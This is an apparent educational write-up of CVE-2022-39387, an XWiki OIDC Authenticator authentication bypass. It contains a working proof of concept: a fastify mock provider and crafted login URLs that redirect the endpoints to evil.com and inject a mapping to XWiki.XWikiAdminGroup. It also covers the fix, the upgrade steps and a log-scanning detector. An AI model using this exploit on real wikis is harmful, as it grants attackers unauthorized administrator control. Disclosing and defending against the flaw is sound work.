In late 2022, a critical vulnerability was disclosed in XWiki's OpenID Connect (OIDC) authentication module. XWiki, an open-source enterprise wiki and knowledge management platform, lets administrators configure login through third-party identity providers. But before OIDC Authenticator version 1.29.1, an attacker could bypass these controls entirely, without hijacking any username or password.

Below, I'll break down exactly how CVE-2022-39387 works, show sample exploit code, and point you toward key references for learning more or patching your install.

Vulnerability: Auth Bypass & Privilege Escalation

- Patch: XWiki OIDC Authenticator 1.29.1

What’s the Problem?

Normally, to hook up an OpenID Connect provider (like Google or Azure AD) in XWiki, you configure it in the server's xwiki.properties file. Only someone with access to the server can do that. The configuration tells XWiki where to send users to log in (the authorization endpoint), where to exchange the code for tokens and fetch user information (the token and userinfo endpoints), and which provider groups map to which XWiki groups.

But in XWiki OIDC Authenticator versions before 1.29.1, the authentication process *trusted* request parameters with the same names as these configuration keys, and anyone can send a request parameter. A malicious or merely curious user could therefore pass the authenticator's own configuration keys as HTTP query parameters, like this:

oidc.endpoint.authorization=http://evil.com/auth
oidc.endpoint.token=http://evil.com/token
oidc.endpoint.userinfo=http://evil.com/userinfo
oidc.groups.mapping=XWiki.XWikiAdminGroup=admins

(The group mapping uses the extension's one-entry-per-line form, XWikiGroup=providerGroup: here every user the provider reports as being in "admins" lands in XWiki.XWikiAdminGroup.)

Doing this, the attacker *overrides* the admin-configured OpenID Connect provider with their own. They log in with whatever credentials their fake provider accepts, and because they also control the group mapping, they hand themselves any XWiki group membership they like, including the admin group.
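To make the failure concrete, here is an added JavaScript illustration of the two lookup policies; it is not the authenticator's own Java code. One function models the pre-1.29.1 behaviour, where a request parameter with the same name as a property shadows the administrator's value, and the same function with the override switched off models the fixed behaviour. The property names are the real ones listed above; the server-side values, the attacker's query string and the provider-group name "admins" are constructed for the example.

```javascript
// Added illustration of the configuration-override bug (not the extension's code).
// Constructed: what an administrator configured in xwiki.properties.
const SERVER_CONFIG = {
  'oidc.endpoint.authorization': 'https://idp.example.com/auth',
  'oidc.endpoint.token': 'https://idp.example.com/token',
  'oidc.endpoint.userinfo': 'https://idp.example.com/userinfo',
  // one "XWikiGroup=providerGroup" entry per line
  'oidc.groups.mapping': ['XWiki.XWikiAdminGroup=wiki-admins'],
};

// Parse "XWiki.Group=providerGroup" lines into providerGroup -> [XWiki groups].
function parseGroupMapping(lines) {
  const map = new Map();
  for (const line of lines) {
    const idx = line.indexOf('=');
    if (idx < 0) continue;                       // malformed entry: ignore it
    const xwikiGroup = line.slice(0, idx).trim();
    const providerGroup = line.slice(idx + 1).trim();
    if (!map.has(providerGroup)) map.set(providerGroup, []);
    map.get(providerGroup).push(xwikiGroup);
  }
  return map;
}

// Resolve the provider XWiki will talk to. trustRequestParams=true models the
// pre-1.29.1 behaviour: a query parameter named like a property wins over the
// administrator's value. With false, only the server-side config is consulted.
function resolveProvider(serverConfig, query, trustRequestParams) {
  const pick = (key) => {
    if (trustRequestParams && query.has(key)) return query.getAll(key);
    const v = serverConfig[key];
    return v === undefined ? [] : [].concat(v);
  };
  return {
    endpoints: {
      authorization: pick('oidc.endpoint.authorization')[0],
      token: pick('oidc.endpoint.token')[0],
      userinfo: pick('oidc.endpoint.userinfo')[0],
    },
    groupMapping: parseGroupMapping(pick('oidc.groups.mapping')),
  };
}

// Translate the provider's group claim into XWiki group memberships.
function xwikiGroupsFor(userinfo, provider) {
  const out = new Set();
  for (const g of userinfo.groups ?? []) {
    for (const xg of provider.groupMapping.get(g) ?? []) out.add(xg);
  }
  return [...out].sort();
}

// Constructed attacker query string: the four overrides from the write-up.
const ATTACK_QUERY = new URLSearchParams(
  'oidc.endpoint.authorization=http://evil.com/auth' +
  '&oidc.endpoint.token=http://evil.com/token' +
  '&oidc.endpoint.userinfo=http://evil.com/userinfo' +
  '&oidc.groups.mapping=XWiki.XWikiAdminGroup%3Dadmins');

// Constructed: what the attacker's fake userinfo endpoint would answer.
const FAKE_USERINFO = { sub: 'attacker', groups: ['admins'] };

const vulnerable = resolveProvider(SERVER_CONFIG, ATTACK_QUERY, true);
const fixed = resolveProvider(SERVER_CONFIG, ATTACK_QUERY, false);
console.log('pre-1.29.1 userinfo endpoint:', vulnerable.endpoints.userinfo,
            'groups:', xwikiGroupsFor(FAKE_USERINFO, vulnerable));
console.log('1.29.1+    userinfo endpoint:', fixed.endpoints.userinfo,
            'groups:', xwikiGroupsFor(FAKE_USERINFO, fixed));
```

With the override trusted, the wiki talks to evil.com and the fake provider's "admins" group becomes XWiki.XWikiAdminGroup; with it ignored, the same request still goes to idp.example.com and the attacker's mapping never exists, so "admins" maps to nothing.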

1. Prepare a Fake OIDC Provider

You could spin up a test OIDC server with an open-source tool like dex, or mock the three endpoints yourself (the oidc-provider npm package also works). The sketch below uses fastify and skips the login form entirely:

// nodejs: mock-oidc.js (very simplified; a working PoC must also return a
// signed id_token that XWiki's OIDC client will accept)
const fastify = require('fastify')();

// XWiki posts to /token as application/x-www-form-urlencoded; fastify
// answers 415 unless it has a parser for that content type.
fastify.addContentTypeParser('application/x-www-form-urlencoded', { parseAs: 'string' },
    (req, body, done) => done(null, Object.fromEntries(new URLSearchParams(body))));

// No login form at all: bounce the browser straight back to XWiki with a code.
fastify.get('/auth', async (req, reply) => {
    const url = new URL(req.query.redirect_uri);
    url.searchParams.set('code', Math.random().toString(36).slice(2));
    if (req.query.state) url.searchParams.set('state', req.query.state);
    return reply.redirect(url.toString());
});

// Accept any code and hand back a bearer token.
fastify.post('/token', async (req, reply) => {
    return { access_token: Math.random().toString(36).slice(2), token_type: 'Bearer',
             expires_in: 3600 /* id_token: <signed JWT> in a real PoC */ };
});

// Claim membership of provider group "admins", which the injected
// oidc.groups.mapping maps to XWiki.XWikiAdminGroup; the claim name "groups"
// must match the claim the authenticator is configured to read groups from.
fastify.get('/userinfo', async (req, reply) => {
    return {
        sub: "attacker",
        email: "attacker@evil.com",
        groups: ["admins"]
    };
});

fastify.listen({ port: 8080 });

2. Craft the Exploit Request

Instead of following XWiki's normal login link, request the login action yourself with your provider's settings appended as query parameters. The group mapping is what turns a login at the fake provider into admin membership:

GET /xwiki/bin/login/XWiki/XWikiLogin?oidc.endpoint.authorization=http://evil.com/auth&oidc.endpoint.token=http://evil.com/token&oidc.endpoint.userinfo=http://evil.com/userinfo&oidc.groups.mapping=XWiki.XWikiAdminGroup%3Dadmins HTTP/1.1
Host: wiki.example.com

Or, more typically, paste the following into your browser's address bar (after adjusting the base URL to your wiki):

https://YOUR-XWIKI-HOST/xwiki/bin/login/XWiki/XWikiLogin?oidc.endpoint.authorization=http://evil.com/auth&oidc.endpoint.token=http://evil.com/token&oidc.endpoint.userinfo=http://evil.com/userinfo&oidc.groups.mapping=XWiki.XWikiAdminGroup%3Dadmins

3. Log in & Profit

XWiki now sends you to the attacker-controlled OIDC server to authenticate. Once the fake provider answers, XWiki treats its tokens and userinfo as genuine, applies the injected group mapping, and you are an admin.

Why It Matters

- Bypass of SSO and MFA: whatever the real identity provider enforces is irrelevant, because the real provider is never contacted.
- Easy privilege escalation: the attacker controls the group mapping and can put themselves in XWiki.XWikiAdminGroup (full permissions).
- No workaround before 1.29.1: the advisory offers no configuration-level mitigation, so upgrading is the fix.

How Was It Fixed?

Starting with version 1.29.1, the OIDC Authenticator no longer takes provider endpoints or group mappings from request parameters; only the server-side configuration in xwiki.properties is used. Attackers therefore can't point the wiki at their own OIDC provider, or rewrite the group mapping, through the URL.

Advisory and patch:

- GitHub Security Advisory GHSA-xxrg-x74h-wj9g
- XWiki OpenID Connect Authenticator 1.29.1 release notes

If you're running any OIDC-enabled XWiki before 1.29.1, patch immediately.

# Your upgrade process may vary! The supported route is XWiki's Extension
# Manager (Administration > Extensions): upgrade the extension with id
# org.xwiki.contrib.oidc:oidc-authenticator to 1.29.1 and restart XWiki.
# If you install jars by hand instead, the artifact on Maven Central is:
cd /path/to/xwiki/extensions
wget https://repo1.maven.org/maven2/org/xwiki/contrib/oidc/oidc-authenticator/1.29.1/oidc-authenticator-1.29.1.jar
# Follow your XWiki install guide to apply the new extension

Also, review the members of XWiki.XWikiAdminGroup and other privileged groups for accounts you don't recognise; an OIDC-provisioned user that does not exist at your real identity provider is a red flag. Your access logs are the other place to look: a legitimate login never needs oidc.* parameters in the query string.
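One way to do that log review, as an added example that is neither part of the advisory nor of the extension: scan the reverse-proxy or servlet access log for requests whose query string carries any oidc.* parameter, and group the hits by source address so you know which sessions to cross-check against the admin group. The Apache/nginx "combined" log format is assumed, the sample lines are constructed, and the empty allowlist is there in case your deployment legitimately passes some oidc.* parameter.

```javascript
// Added example: hunt for configuration-override attempts in access logs.
// Assumes Apache/nginx "combined" format; the lines below are constructed.
const SAMPLE_LOG = [
  '10.0.0.5 - - [03/Nov/2022:10:15:02 +0000] "GET /xwiki/bin/view/Main/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [03/Nov/2022:10:15:40 +0000] "GET /xwiki/bin/login/XWiki/XWikiLogin?oidc.endpoint.authorization=http://evil.com/auth&oidc.endpoint.token=http://evil.com/token&oidc.endpoint.userinfo=http://evil.com/userinfo&oidc.groups.mapping=XWiki.XWikiAdminGroup%3Dadmins HTTP/1.1" 302 0 "-" "curl/7.85.0"',
  '10.0.0.9 - - [03/Nov/2022:10:16:11 +0000] "GET /xwiki/bin/login/XWiki/XWikiLogin?xredirect=%2Fxwiki%2Fbin%2Fview%2FMain%2F HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
  '203.0.113.7 - - [03/Nov/2022:10:17:03 +0000] "POST /xwiki/bin/login/XWiki/XWikiLogin?oidc.endpoint.userinfo=http%3A%2F%2Fevil.com%2Fuserinfo HTTP/1.1" 302 0 "-" "python-requests/2.28"',
];

// All of the authenticator's configuration keys share this prefix, so a
// query parameter starting with it is someone trying to reconfigure the login.
const CONFIG_PREFIX = 'oidc.';

// ip, ident, user, [time], "method target protocol", status
const COMBINED_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/;

function parseLine(line) {
  const m = COMBINED_RE.exec(line);
  if (!m) return null;                          // not a combined-format line
  const [, ip, time, method, target, status] = m;
  const url = new URL(target, 'http://placeholder');   // base only to parse a path
  return { ip, time, method, path: url.pathname, params: url.searchParams, status: Number(status) };
}

// Return one finding per request that carries a non-allowlisted oidc.* parameter.
function findOidcOverrides(lines, allowlist = new Set()) {
  const hits = [];
  for (const line of lines) {
    const req = parseLine(line);
    if (!req) continue;
    const overridden = [...new Set(req.params.keys())]
      .filter((k) => k.startsWith(CONFIG_PREFIX) && !allowlist.has(k));
    if (overridden.length === 0) continue;
    hits.push({
      ip: req.ip, time: req.time, method: req.method, path: req.path, status: req.status,
      overridden: [...overridden].sort(),
      // the endpoints the attacker tried to steer the wiki to, decoded
      endpoints: overridden.filter((k) => k.startsWith('oidc.endpoint.')).map((k) => req.params.get(k)),
    });
  }
  return hits;
}

// Count hits per source address: these are the sessions whose resulting
// accounts and group memberships need a closer look.
function suspectsByIp(hits) {
  const byIp = new Map();
  for (const h of hits) byIp.set(h.ip, (byIp.get(h.ip) ?? 0) + 1);
  return byIp;
}

const hits = findOidcOverrides(SAMPLE_LOG);
for (const h of hits) {
  console.log(`${h.time} ${h.ip} ${h.method} ${h.path} -> ${h.overridden.join(', ')} ${h.endpoints.join(' ')}`);
}
console.log('suspect addresses:', [...suspectsByIp(hits).entries()]);
```

Run it over your real log instead of SAMPLE_LOG (one line per array element, or read the file and split on newlines); on the constructed input it flags the two requests from 203.0.113.7 and ignores the ordinary login with an xredirect parameter.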

Summary Table

| Field             | Value                                              |
|-------------------|----------------------------------------------------|
| CVE ID            | CVE-2022-39387                                     |
| Component         | XWiki OIDC Authenticator                           |
| Impact            | Authentication bypass, admin privilege escalation  |
| Attack Complexity | Low                                                |
| Requires Auth?    | No (access to the login page is enough)            |
| Fixed In          | 1.29.1                                             |
| Exploit Public?   | Yes, trivial: request-parameter override as above  |

Further Reading

- XWiki OIDC Authenticator Extension
- CVE-2022-39387 on NVD
- XWiki Security Best Practices

Final Thoughts

Simple to exploit and devastating in effect, CVE-2022-39387 shows why trusted configuration must never be overridable from an untrusted source such as a request parameter. Keep authentication modules up to date, and check how your own systems handle overrides from URL parameters. If you haven't already, upgrade to OIDC Authenticator 1.29.1 now!

Stay safe out there! 🚨

*This analysis is provided solely for educational purposes and aims to help sysadmins and devs secure their XWiki sites. For questions, get in touch with the XWiki security team.*

Timeline

Published on: 11/04/2022 19:15:00 UTC
Last modified on: 11/07/2022 19:12:00 UTC